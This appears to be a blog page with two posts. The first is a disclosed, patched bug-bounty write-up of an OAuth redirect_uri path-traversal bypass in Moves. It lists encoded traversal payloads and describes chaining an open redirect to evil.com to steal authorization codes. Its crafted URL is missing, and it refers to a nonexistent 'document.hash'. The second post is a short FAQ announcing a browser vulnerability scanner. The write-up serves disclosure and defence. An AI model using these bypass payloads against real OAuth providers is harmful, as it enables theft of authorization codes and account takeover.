Facebook's Moves - OAuth redirect_uri bypass

3:53 PM

This is going to be a very short post about a redirect_uri bypass technique I found in Moves.

Moves is a company owned by Facebook and one of the acquisitions in scope for the bug bounty program they are running.

I have written about an XSS bug in this same parameter in a post entitled "Moves OAuth XSS"; this one will cover a not-so-common redirect_uri bypass method.

Anyway, there are a lot of known ways to bypass redirect_uri checks in OAuth; which ones work depends on the server-side check we are facing and what limiting factors there are. For instance, in Facebook's case, if you set your application's allowed callback to https://www.anyurl.com/directory it will allow that plus anything following it, so https://www.anyurl.com/directory/anotherdirectory?y=xz is considered perfectly valid. Some other sites like Coinbase and Uber implement it differently: the addition of any query, directory or domain is considered invalid, so scenarios that worked on Facebook will be invalid there.

That leaves some OAuth clients heavily misconfigured and sometimes makes serious issues like OAuth bypasses possible.

However, the servers handling these URLs are sometimes confused (often because they are dealing with URL-encoded values), and some bypasses are possible.
Consider a site that configured its allowed callback URL to https://example.com/some/path.

Possible bypasses to tamper with the sub-directories:

  1. https://example.com/some/path
  2. https://example.com/some/path/../../new/path
  3. https://example.com/some/path/%2e%2e/%2e%2e/new/path
  4. https://example.com/some/path/%252e%252e/%252e%252e/new/path (double encoded)
  5. https://example.com/new/path///../../some/path/
  6. https://example.com/some/path/.%0a./.%0d./new/path (for servers ignoring non-printable CRLF characters)

In Moves' case, I used the 5th example. It basically confuses the parser and thus lets it assume /new/path/ is the allowed subdirectory.

PoC app: https://api.moves-app.com/oauth/v1/authorize?response_type=code&client_id=2KQ3D5coba76A5eg42mlu3L3Kd3btEeS&scope=location&redirect_uri=https://example.com/new/path///../../some/path/ (obviously patched)

That application, although configured to redirect to https://example.com/some/path, will redirect to https://example.com/new/path.
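To make the parser disagreement concrete from the provider's side, here is an added example (not code from the post or from Moves) that models a check which decodes and normalises the path with slash-collapsing semantics before prefix-matching, next to RFC 3986 dot-segment resolution (which keeps empty segments, as browsers do) and the exact-match check the OAuth specs recommend. The registered callback and the URLs are the post's values; the function names and the flawed check are hypothetical.

```python
import posixpath
from urllib.parse import urlsplit, unquote

# Registered callback from the post; the bypass URLs are the post's examples.
REGISTERED = "https://example.com/some/path"
REG = urlsplit(REGISTERED)


def remove_dot_segments(path):
    """RFC 3986 section 5.2.4 resolution. Empty segments ("//") stay segments,
    so '..' consumes them the way a browser does. Hypothetical helper."""
    segs = path.split("/")[1:]          # drop the empty item before the leading "/"
    out = []
    for seg in segs:
        if seg == "..":
            if out:
                out.pop()
        elif seg != ".":
            out.append(seg)
    if segs and segs[-1] in (".", ".."):
        out.append("")                  # a trailing dot segment leaves a trailing "/"
    return "/" + "/".join(out)


def browser_target(uri):
    """Where the user agent actually lands after the 302 to redirect_uri."""
    p = urlsplit(uri)
    return f"{p.scheme}://{p.netloc}{remove_dot_segments(p.path)}"


def slash_collapsing_check(uri):
    """Models the flawed provider check described in the post: decode once,
    normalise with posixpath (which collapses '///' before resolving '..'),
    then prefix-match the path against the registered one."""
    p = urlsplit(uri)
    path = posixpath.normpath(unquote(p.path))
    return (p.scheme, p.netloc) == (REG.scheme, REG.netloc) and path.startswith(REG.path)


def strict_check(uri):
    """Mitigation: exact string comparison with the registered redirect_uri.
    No prefix matching and no normalisation, so no two parsers can disagree."""
    return uri == REGISTERED


if __name__ == "__main__":
    bypass = "https://example.com/new/path///../../some/path/"
    print(slash_collapsing_check(bypass), browser_target(bypass), strict_check(bypass))
```

For the 5th example the flawed check sees /some/path and accepts, while the browser resolves the redirect under /new/path/; exact matching rejects it outright.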

Attack Scenario:

Consider an open redirect in example.com like https://example.com/somepath/redirect?to=evil.com.
If the developer set the callback to https://example.com/moves/callback, he will expect the OAuth provider not to accept other paths (so the open redirect is low priority here).

However, using the bypass, we create our malicious path like:

We encode the characters so it will be considered as a path and not tamper with the parser.
The %23 (#) is added at the end so that the rest of the path following it (../moves/callback) does not matter.

That will redirect to https://example.com/somepath/redirect?to=evil.com#/moves/callback?code=CODE (my precious) and we just get our stolen code via document.hash, and game over!

Here is a video PoC.

Report Timeline

Apr 29 - Initial Report
May 6 - Triage
May 9 - Patch

Introducing Zerorose - The Anti Exploitkit.

5:26 PM

For a couple of months now, a friend and I have been working on an interesting project called Zerorose. Basically it is a web vulnerability scanner, but not in the sense you are probably thinking of: we scan your system for vulnerabilities from our site.

Zerorose is a project that tries to use a couple of machine learning algorithms to analyze known vulnerabilities in the visitor's system. It does this by identifying plugins, browser, OS, common misconfigurations and similar key identifiers, and checking whether any of them are known to be vulnerable to any issues, whether they are infected with malware, whether they are still supported, and whether their compatibility or installation can cause other issues or best-practice bypasses. We try to make sure exploit kits, adware and other malicious infections like ransomware don't happen.

“An exploit kit is a software kit designed to run on web servers, with the purpose of identifying software vulnerabilities in client machines communicating with it, and discovering and exploiting vulnerabilities to upload and execute malicious code on the client. One of the earlier kits was MPack, in 2006. Exploit kits are often designed to be modular and easy to use, enabling the addition of new vulnerabilities and the removal of existing ones.”

Do you have a cool video so that I can show my friends?

In short: we identify exploitable vulnerabilities (hopefully) before the bad guys do, so you can roam the internet freely without automatic client-side exploits triggering from infected, shady sites, malvertising campaigns and that porn site you sometimes visit.

False Positives

Although we try to deliver reliable and actionable information, it is possible for the system to assume and identify non-existent issues because of a number of factors. This could be because you are using a modified user agent or modified plugins, or because the names of plugins, add-ons or scripts you are using match known malware. If that is the case, you can click on "Report" at the right side of the report and it will try to evaluate the issue (of course, with a manual check) and learn from its mistakes.

How are you different from exploit kits?

You may have heard of Blackhole, Crime, Angler or other exploit kits. What they do is not much different from what we do, except maybe: we help you patch instead of exploiting you, and we are cooler in many ways. ;))

Can I trust zerorose?

Of course. *promises*

Are you the only one doing this?

As far as we are aware, yes. Us and exploit kits.

Why not open source?

We figured it's quite a bit easier to visit our website than to download and run it on your host every time you want to scan something, and that data will soon be outdated. That, and we don't want to share our codez.

Why is it free?

Honestly, we have no idea. I know it's a bit suspicious why we went this far to build this, but it was mostly done just because we care. =))

Do you accept donations?

Yes, we welcome any kind of help, as we are a small team doing this part time. Please click here to do that.
I hope you find this interesting and that it helps you.